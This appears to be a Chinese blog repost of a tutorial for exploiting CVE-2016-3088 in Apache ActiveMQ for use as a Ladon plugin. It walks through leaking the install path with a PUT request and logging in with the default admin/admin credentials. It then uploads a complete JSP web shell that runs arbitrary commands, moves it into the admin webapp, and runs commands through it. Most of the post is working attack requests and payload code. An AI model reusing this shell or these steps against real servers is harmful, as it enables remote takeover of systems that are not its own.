码迷,mamicode.com
首页 > 系统相关 > 详细

Ladon插件CVE-2016-3088 ActiveMQ GetShell Exploit

时间:2020-02-14 16:23:43      阅读:140      评论:0      收藏:0      [点我收藏+]

标签:who   imp   roc   根目录   目录   page   jsp   buffere   uil   

前言

使用Exp生成器生成Ladon插件实战,CVE-2016-3088 ActiveMQ GetShell

0x000 漏洞信息

漏洞编号: CVE-2016-3088

漏洞原理: ActiveMQ 中的 FileServer 服务允许用户通过 PUT/MOVE方法上传文件到指定目录

影响版本: Apache ActiveMQ 5.0.0 – 5.13.2

0x001 获取路径

PUT /fileserver/%20/%20

技术图片

0x002 上传shell

上传和移动文件需登陆,默认帐密admin/admin,将以下代码双引号进行转义(原本是转义好的被github过滤了)

PUT

AddUrl: /fileserver/cmd.jsp

PUTData: <%@ page import="java.io.*"%><%out.print("Hello");String strcmd = request.getParameter("cmd");String line =null;Process p=Runtime.getRuntime().exec(strcmd);InputStream is = p.getInputStream();BufferedReader br = new BufferedReader(new InputStreamReader(is));while((line =br.readLine())!=null){out.print(line+"");}%>

Authorization: admin:admin

技术图片

0x003 移动shell

根目录和fileserver均不解析JSP文件,好在admin和api目录可以解析

MOVE

AddUrl: /fileserver/cmd.jsp

Destination: file://C:/Users/null/Desktop/apache-activemq-5.9.0/webapps/admin/cmd.jsp

技术图片

0x004 Cscan调用

技术图片

0x005 连接shell

访问http://192.168.1.26:8161/admin/shell.jsp?cmd=whoami

技术图片

0x006 视频教程

Video1: K8Cscan Apache ActiveMQ GetShell CVE-2016-3088

Video2: WhatCMS指纹识别内网ActiveMQ&GetShell

Ladon插件CVE-2016-3088 ActiveMQ GetShell Exploit

标签:who   imp   roc   根目录   目录   page   jsp   buffere   uil   

原文地址:https://www.cnblogs.com/k8gege/p/12307455.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!